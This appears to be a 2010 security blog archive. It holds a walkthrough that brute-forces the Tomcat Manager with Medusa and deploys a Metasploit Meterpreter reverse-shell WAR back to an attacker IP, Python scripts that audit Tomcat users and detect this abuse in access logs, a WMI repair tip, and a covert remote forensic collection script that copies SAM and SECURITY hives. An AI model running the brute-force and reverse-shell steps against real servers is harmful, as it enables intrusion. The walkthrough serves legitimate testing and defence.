Archive for March, 2010

Using Medusa and Metasploit against Tomcat

In this post I thought I would do a simple demonstration of how to use Medusa to test for Tomcat accounts and then use Medusa’s findings to exploit Tomcat with Metasploit.  I am going to assume you have Medusa and Metasploit installed and that you enumerated a Tomcat server by some method like Nmap or Nessus, or you just knew an application uses Tomcat.  For my example, 192.168.1.30 is the Tomcat server and 192.168.1.2 is the attacker.  After you have verified you found a Tomcat server, open a browser and visit the Tomcat Manager application:

http://192.168.1.30:8080/manager/html

It should prompt you for a user/pass.  Since we don’t know the user/pass, this is the page we run a dictionary attack against.  Hopefully you have some dictionary files, but for this example I am just going to create a very simple one:

# cat /tmp/usernames
test
admin
monkey
manager
commanderpoo

# cat /tmp/passwords
test
rockyou
password123
password12345
changeme

Then we tell Medusa to perform something similar to this

# ./medusa -M http -h 192.168.1.30 -U /tmp/usernames -P /tmp/passwords -e ns -n 8080 -m DIR:manager/html
(-M) http module
(-h) host IP or name
(-U) username dictionary file
(-P) password dictionary file
(-e ns) [n] No Password, [s] Password=Username
(-n) port number
(-m) directory path for URL

If Medusa finds an account it should print out a [SUCCESS] next to the account found

ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: monkey (3 of 6, 2 complete) Password: changeme (8 of 8 complete)
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: manager (4 of 6, 3 complete) Password:  (1 of 8 complete)
ACCOUNT FOUND: [http] Host: 192.168.1.30 User: manager Password:  [SUCCESS]
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: root (5 of 6, 4 complete) Password:  (1 of 8 complete)
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: root (5 of 6, 4 complete) Password: root (2 of 8 complete)

Here Medusa found the account “manager” with no password set.  Now revisit the URL, entering the newly discovered user/pass, and you should see the Manager application’s list of deployed applications (shown as a screenshot in the original post).
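
Before moving on, the same finding from the defender’s side. The following Python script is an added example and is not part of the original post: it audits a Tomcat tomcat-users.xml for exactly the three conditions a Medusa run with `-e ns` and the demo password list would hit (empty password, password equal to the username, password present in the wordlist) and notes when such an account also holds a manager/admin role. The sample XML and the svc_app password are constructed for the example; the wordlist is the post’s own five entries.

```python
"""Audit a tomcat-users.xml for the credentials a dictionary attack finds first.

Added example (not from the original post). Assumptions: the input is a
standard Tomcat tomcat-users.xml; the wordlist is the post's demo password
list; the sample XML below is constructed for this example.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: the "manager" account has no password, as in the post.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="manager" password="" roles="manager"/>
  <user username="admin" password="admin" roles="admin,manager"/>
  <user username="deploy" password="changeme" roles="manager"/>
  <user username="svc_app" password="Xk3#q9LmT2vP" roles="manager"/>
</tomcat-users>
"""

# The post's five-entry demo password list; a real audit would use a real wordlist.
DEMO_WORDLIST = {"test", "rockyou", "password123", "password12345", "changeme"}

# Roles that grant deploy/undeploy rights through the Manager application.
PRIVILEGED_ROLES = {"manager", "manager-gui", "manager-script", "admin", "admin-gui"}


def _local_name(tag):
    """Strip an XML namespace prefix ({ns}user -> user); newer files carry xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, wordlist=DEMO_WORDLIST):
    """Return {username: [problems]} for every account a dictionary attack would hit.

    The first two checks correspond to Medusa's -e n (empty password) and
    -e s (password equal to username); the third is the plain wordlist match.
    """
    findings = {}
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts either username= or name= on a <user> element.
        user = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}

        problems = []
        if password == "":
            problems.append("empty password")
        elif password.lower() == user.lower():
            problems.append("password equals username")
        elif password in wordlist:
            problems.append("password in demo wordlist")
        if problems and roles & PRIVILEGED_ROLES:
            problems.append("holds manager/admin role")
        if problems:
            findings[user] = problems
    return findings


def audit_file(path, wordlist=DEMO_WORDLIST):
    """Convenience wrapper for a real file, e.g. $CATALINA_HOME/conf/tomcat-users.xml."""
    with open(path, encoding="utf-8") as fh:
        return audit_tomcat_users(fh.read(), wordlist)


if __name__ == "__main__":
    result = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_tomcat_users(SAMPLE_TOMCAT_USERS)
    for user, problems in result.items():
        print(f"{user}: {', '.join(problems)}")
```

Run it with no arguments to audit the constructed sample, or pass the path of a real tomcat-users.xml. On the sample it reports manager (empty password), admin (password equals username) and deploy (wordlist hit), all of which also hold a manager role; svc_app passes.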

To take advantage of this newfound power we are going to upload and deploy a malicious WAR file into Tomcat.  To create the WAR file use Metasploit’s msfpayload and pick your desired payload:

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4545 W > /tmp/MetRev.war

Once the WAR file payload is created you need to upload it to Tomcat via the Manager Application.  So under the section “WAR file to upload” select your msfpayload.

Start up msfconsole and configure it to handle your payload

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler

Once Metasploit is ready and waiting for a connection, you need to get Tomcat to run your WAR.  There might be an easier way, but I found that if you look in the WAR file and determine the JSP file name you can just call that JSP in the browser.  So figure out the random JSP file name:

# unzip -l /tmp/MetRev.war
Archive:  /tmp/MetRev.war
Length      Date    Time    Name
---------  ---------- -----   ----
71  03-31-2010 23:01   META-INF/MANIFEST.MF
0  03-31-2010 23:01   WEB-INF/
276  03-31-2010 23:01   WEB-INF/web.xml
1157  03-31-2010 23:01   xnjpnric.jsp
75776  03-31-2010 23:01   rQUihgjlKyT.txt
---------                     -------
77280                     5 files

Then in your browser visit the jsp page and MSF should get a connection back.  From there you can do what you want (always fun to migrate over to Explorer.exe’s pid and take a screenshot)

http://192.168.1.30:8080/MetRev/xnjpnric.jsp
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:4545 -> 192.168.1.30:4230)
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > migrate 618
meterpreter > screenshot
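
Everything the post just did leaves a trail in Tomcat’s access log. The following Python script is an added example, not part of the original post or of Metasploit: it runs over a handful of constructed access-log lines in the default Tomcat pattern (`%h %l %u %t "%r" %s %b`) and raises alerts for a burst of 401s on /manager, a Manager login from an IP that was just failing, a deployment through the Manager upload/deploy endpoints, and the first request to a context the baseline does not know, which is the /MetRev/xnjpnric.jsp call above. The known-context baseline, the failure threshold and the sample lines are assumptions constructed for the example.

```python
"""Spot Manager-application abuse in a Tomcat access log.

Added example (not from the original post or Metasploit). Assumes the default
Tomcat access-log pattern  %h %l %u %t "%r" %s %b  and a baseline of known
contexts; the sample lines are constructed to mirror the post's timeline.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Manager endpoints that deploy code: the HTML upload form and the text/deploy paths.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

# Constructed baseline: contexts that are supposed to exist on this server.
KNOWN_CONTEXTS = {"manager", "myapp"}

# Constructed sample log: six guesses, a hit on the empty password, a WAR upload,
# then the first request to the freshly deployed /MetRev context.
SAMPLE_LOG_LINES = [
    '192.168.1.2 - - [31/Mar/2010:23:02:01 -0400] "GET /manager/html HTTP/1.1" 401 2473',
] * 6 + [
    '192.168.1.2 - manager [31/Mar/2010:23:02:05 -0400] "GET /manager/html HTTP/1.1" 200 15323',
    '192.168.1.2 - manager [31/Mar/2010:23:04:10 -0400] "POST /manager/html/upload HTTP/1.1" 200 16014',
    '192.168.1.2 - - [31/Mar/2010:23:04:40 -0400] "GET /MetRev/xnjpnric.jsp HTTP/1.1" 200 0',
    '10.0.0.7 - - [31/Mar/2010:23:05:00 -0400] "GET /myapp/index.jsp HTTP/1.1" 200 812',
    '192.168.1.50 - admin [31/Mar/2010:23:06:00 -0400] "GET /manager/html HTTP/1.1" 200 15323',
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze_access_log(lines, known_contexts=KNOWN_CONTEXTS, fail_threshold=5):
    """Return a list of alert dicts in the order the evidence appears."""
    alerts, seen = [], set()
    failures = Counter()   # ip -> 401 responses seen on /manager
    deployers = {}         # ip -> user that deployed through the Manager
    contexts = set(known_contexts)

    def alert(kind, ip, detail):
        # Emit each distinct alert once so a long log does not flood the output.
        if (kind, ip, detail) not in seen:
            seen.add((kind, ip, detail))
            alerts.append({"kind": kind, "ip": ip, "detail": detail})

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, user, path, status = rec["ip"], rec["user"], rec["path"], rec["status"]
        parts = path.split("/")
        context = parts[1] if len(parts) > 1 else ""

        if context == "manager":
            if status == 401:
                failures[ip] += 1
                if failures[ip] == fail_threshold:
                    alert("manager_bruteforce", ip, f"{fail_threshold} failed logins on /manager")
            elif status == 200:
                if failures[ip] >= fail_threshold:
                    alert("bruteforce_success", ip,
                          f"manager login as '{user}' after {failures[ip]} failures")
                if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
                    deployers[ip] = user
                    alert("war_deploy", ip, f"'{user}' deployed an application via {path}")
            continue

        if context and context not in contexts:
            contexts.add(context)  # alert once per newly seen context
            detail = f"first request to unknown context /{context}"
            if ip in deployers:
                detail += f" from the IP that deployed as '{deployers[ip]}'"
            alert("new_context", ip, detail)
    return alerts


if __name__ == "__main__":
    for a in analyze_access_log(SAMPLE_LOG_LINES):
        print(f"[{a['kind']}] {a['ip']}: {a['detail']}")
```

The four alerts the sample produces come from one source address, in the same order as the post’s steps: guessing, a successful login, the upload, and the first hit on the new context. Feeding real `localhost_access_log.*.txt` lines to `analyze_access_log` with your own context baseline gives the same chain; the admin login from 192.168.1.50 with no prior failures is intentionally silent.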

wmic not working

I ran across a machine today that wasn’t letting me run wmic commands on it. I was getting a few different errors

Description = The RPC server is unavailable.
Facility = Win32
Parsing Mof File: C:\WINDOWS\System32\wbem\Cli.mof(Phase Error - 3)

After a good deal of fiddling I got it to work by doing the following

Stop winmgmt and its needed dependencies
go to \\remotemachine\c$\windows\system32\wbem
rename the Repository directory to something else
start winmgmt on the remote machine
open a cmd window via psexec on the remote machine and add an HKCU key

sc \\remotemachine stop winmgmt        (and its needed dependent services)
rename remotemachine's c:\windows\system32\wbem\repository
sc \\remotemachine start winmgmt
psexec \\remotemachine cmd.exe
reg add "hkcu\Environment" /v PROCESSOR_ARCHITECTURE /t REG_SZ /d x86

Then, while still in the remote cmd window, try wmic and it should work:

wmic process list brief

Kludge – a simple analysis script

Kludge – Kludge-2.9.zip

Whenever I need to investigate a machine, whatever the reason (an AV alert, an IDS sensor alert, a user call-in or whatever), I like to use some standard, simple, repeatable steps. A while back, I put together a horribly coded batch script that is basically a wrapper to run a collection of different commands and tools that perform a handful of simple analysis steps. The script writes the results out into an awkward HTML report, and after that it’s up to you to analyze the results. Of course these checks aren’t fool-proof investigative steps and there are a million ways to thwart detection, but they are a decent start.

The script is broken down into a bat file and a vbs file and depending on what level of analysis you want you can choose how verbose you want the output. I could probably make a better script and perhaps just one script using nothing but vbscript but vbscript isn’t my cup of tea. I tried to make the script as non-intrusive to the user as possible so the user probably won’t notice.

Script Features
Can be run remotely without user interaction/knowledge

Gathers System Information – environment variables, OS info, path, drive info, partition info, user accounts, scheduled tasks, logged on users, shares, USB Device History, Installed Hotfixes and Service Packs

Network info – TCP/UDP Connections, Cached DNS, IP and route info, firewall info, hosts file contents, NetBios Connections, NetBios over TCP Connections, Cache and Resolution, NetBios Session Information

Process Information – lists all running processes, list all processes using wsock32.dll, Startup Apps, Services, Dlls, Open Handles

File Information – dumps IE and FF browser history, outputs contents of Program Files, Documents and Settings and Windows directories, searches for ADS files, md5 hashes of Windows and Docs&Settings directories, outputs event logs, outputs Flash version, Acrobat versions, Java Versions and lists version used by browser, Firefox version, outputs each user’s recyclebin contents, copies all user’s Flash Cookies, outputs any unsigned executables in the sys32 directory

Registry Information – outputs installed BHO’s, outputs a bunch of common reg keys, dumps HKLM, HKCU, HKCR, HKU, HKCC, copies Sam, Sam.log, Sam.sav, Security, Security.log, Security.sav, Software, Software.log, Software.sav, System, System.alt, System.log, System.sav, Default, Default.log, Default.sav, Userdiff, Userdiff.log, Ntuser.dat.log and each user’s NTUSER.DAT.  Outputs RegRipper plugins against each hive file, outputs RegSlack against each hive, outputs Regscan

AV – currently dumps McAfee logs and Symantec logs (XP and Vista), outputs quarantine folder contents, runs rootkit scans

Memory Analysis – dumps memory, dumps individual process memory, Virtual and Physical memory process analysis

Running the Script
There are two different ways to run the script: the bat file is for running locally, the vbs file is for running remotely.  Whichever version you run, when the script is done it cleans itself up and zips up the report.  Output detail levels are the same whether running remotely or locally.
The levels are the following
- 1 – short analysis
- 2 – detailed analysis
- 3 – detailed analysis that includes all checks, md5 hashes, ADS file output and full memory dumping along with individual process dumps.

Locally running the script
For running locally, use kludge.bat or use cscript to call the kludge.vbs file from the command line.
To run locally, unzip kludge.zip and place all the needed tools into a directory with kludge.bat/vbs.  Then to run kludge.bat with a detail level of '2' do:
# kludge.bat 2

Remotely running the script
For running remotely use kludge.vbs. kludge.vbs suppresses the output on the user’s end, so the user will be unaware.
When you run the script you can use the following syntax, where '2' is the detail level.

kludge.vbs 2

To run remotely:
1. As Admin go to \\RemoteMachine\c$
2. Copy the kludge folder containing all the tools and the 2 scripts to the remote machine (for example to c:\)
3. Then as an Admin open a Command Prompt on your machine
4. Change directories to wherever you keep psexec.exe and run the following, picking 1, 2 or 3 for your output detail level

 psexec.exe \\RemoteMachine -u domain\AdminUserName -w c:\kludge cmd.exe /c c:\kludge\kludge.vbs 2

5. Then copy the report to your machine

I also added a couple of extra arguments in case you want to keep track of what machines you ran the script against and determine whether you have run it before against the same machine. To do this you could set up a share somewhere on the network and create a csv file on the share. Then execute the script like the following

 psexec.exe \\RemoteMachine -u domain\AdminUserName -w c:\kludge cmd.exe /c c:\kludge\kludge.vbs 3 123456 nick

Where '3' is the detail level, "12345" could be a ticket number and "nick" is the analyst’s name. This info could be written to the remote share’s csv file, and you could have the script search the csv file for any previous occurrences involving this machine and report on them.
I did not add the needed code for the csv write/read to the kludge.bat file since not everyone will use this, so to take advantage of it edit the bat file and add something like this near the top.

echo ^Analysis Ran last on^ >> Report-%COMPUTERNAME%.html
echo ^ >> Report-%COMPUTERNAME%.html
grep %computername% \\192.168.1.1\Reports\reports.csv >> Report-%COMPUTERNAME%.html
echo %computername%,%date%,%2,%3 >> Report-%COMPUTERNAME%.html
echo %computername%,%date%,%2,%3 >> \\192.168.1.1\Reports\reports.csv

echo ^ >> Report-%COMPUTERNAME%.html
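
The batch lines above glue the tracking together with grep and echo. As an added example that is not part of Kludge itself, here is the same bookkeeping in Python: look up earlier runs for the host in the shared reports.csv, append this run, and produce an HTML fragment for the report. The CSV column order (computername, date, ticket, analyst) matches what the batch lines write with %2 and %3; the share path, the sample rows and the script name are assumptions constructed for the example.

```python
"""Track which machines the analysis script has already been run against.

Added example (not part of Kludge). Assumes a shared CSV with the columns
computername,date,ticket,analyst, which is what the post's batch lines write.
"""
import csv
import html
import io
import os
import socket
import sys
from datetime import date

FIELDS = ["computername", "date", "ticket", "analyst"]

# Share path from the post; adjust for your environment.
SHARE_CSV = r"\\192.168.1.1\Reports\reports.csv"

# Constructed contents of an existing reports.csv.
SAMPLE_CSV = (
    "WS-0412,2010-03-02,100001,nick\n"
    "SRV-FILE1,2010-03-10,100087,sarah\n"
    "WS-0412,2010-03-28,100233,nick\n"
)


def previous_runs(csv_text, computername):
    """Return earlier rows for this host (case-insensitive match), oldest first."""
    reader = csv.DictReader(io.StringIO(csv_text), fieldnames=FIELDS)
    return [row for row in reader
            if (row["computername"] or "").strip().lower() == computername.lower()]


def record_run(csv_text, computername, ticket, analyst, run_date=None):
    """Append a row for this run and return the new CSV text."""
    run_date = run_date or date.today().isoformat()
    if csv_text and not csv_text.endswith("\n"):
        csv_text += "\n"
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerow([computername, run_date, ticket, analyst])
    return csv_text + buf.getvalue()


def report_fragment(computername, runs):
    """HTML snippet for the report: previous runs, or a note that there were none."""
    out = ["<h3>Analysis ran last on</h3>"]
    if not runs:
        out.append(f"<p>No previous runs recorded for {html.escape(computername)}</p>")
    else:
        out.append("<ul>")
        for r in runs:
            out.append("<li>" + html.escape(
                f"{r['date']} ticket {r['ticket']} by {r['analyst']}") + "</li>")
        out.append("</ul>")
    return "\n".join(out)


def main(argv):
    """Usage: track_runs.py <ticket> <analyst>  (mirrors kludge.vbs's extra arguments)."""
    ticket, analyst = argv[1], argv[2]
    host = os.environ.get("COMPUTERNAME") or socket.gethostname()
    text = ""
    if os.path.exists(SHARE_CSV):
        with open(SHARE_CSV, encoding="utf-8") as fh:
            text = fh.read()
    runs = previous_runs(text, host)
    with open(f"Report-{host}.html", "a", encoding="utf-8") as report:
        report.write(report_fragment(host, runs) + "\n")
    with open(SHARE_CSV, "w", newline="", encoding="utf-8") as share:
        share.write(record_run(text, host, ticket, analyst))


if __name__ == "__main__":
    main(sys.argv)
```

The read is done before the append so a host’s own fresh row never shows up as a "previous" run, and the HTML is escaped so a hostname or analyst name with odd characters cannot break the report.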

Getting the tools -
In order to run the script you will need to download some tools, and since I can’t distribute them here are the links to them.
Kludge – Kludge-2.9.zip
Listdlls.exe – http://technet.microsoft.com/en-us/sysinternals/bb896656.aspx
handle.exe – http://technet.microsoft.com/en-us/sysinternals/bb896655.aspx
Psinfo.exe – http://technet.microsoft.com/en-us/sysinternals/bb897550.aspx
psloggedon.exe – http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx
streams.exe – http://technet.microsoft.com/en-us/sysinternals/bb897440.aspx
tcpvcon.exe – http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx
vmmap.exe – http://technet.microsoft.com/en-us/sysinternals/dd535533.aspx
autorunsc.exe – http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx
SigCheck.exe – http://technet.microsoft.com/en-us/sysinternals/bb897441.aspx
procdump.exe – http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

7za.exe – 7-Zip Command Line Version – http://www.7-zip.org/download.html
grep.exe, uniq.exe, cut.exe – http://sourceforge.net/projects/unxutils/
md5deep.exe – http://md5deep.sourceforge.net/
mdd.exe – physical memory acquisition tool – http://sourceforge.net/projects/mdd/files/
mbr.exe – GMER mbr rootkit scanner – http://www2.gmer.net/mbr/
sarcli.dll, sar1.dll, sar2.dll, sar3.dll, sar4.dll, sar5.dll, sar6.dll, MEMSWEEP.sys, helper.exe – Sophos sarcli.exe – http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html
catchme.exe – rootkit/stealth malware scanner – http://www2.gmer.net/catchme.htm
rifiuti.exe, cygwin1.dll – http://www.foundstone.com/us/resources/proddesc/rifiuti.htm
rip.exe, regscan.exe, regslack.exe, p2x588.dll and the plugins directory from regripper – http://www.regripper.net/
HoboCopy.exe – http://sourceforge.net/projects/wangdera/files/HoboCopy/

I was asked to use some Windows binaries from a trusted source in case the machine I am analyzing has tainted exe’s, so I set the script to call the following from the same folder as the script. You will need to copy the following exe’s into the same folder, or simply edit the script and remove the .\ from the command.

Arp.exe – native Windows command. Copy the binary from trusted box
At.exe – native Windows command. Copy the binary from trusted box
ipconfig.exe – native Windows command. Copy the binary from trusted box
nbtstat.exe – native Windows command. Copy the binary from trusted box
net.exe – native Windows command. Copy the binary from trusted box
netsh.exe – native Windows command. Copy the binary from trusted box
netstat.exe – native Windows command. Copy the binary from trusted box
route.exe – native Windows command. Copy the binary from trusted box
schtasks.exe – native Windows command. Copy the binary from trusted box

Please let me know if you have any suggestions, issues, modifications and/or comments.
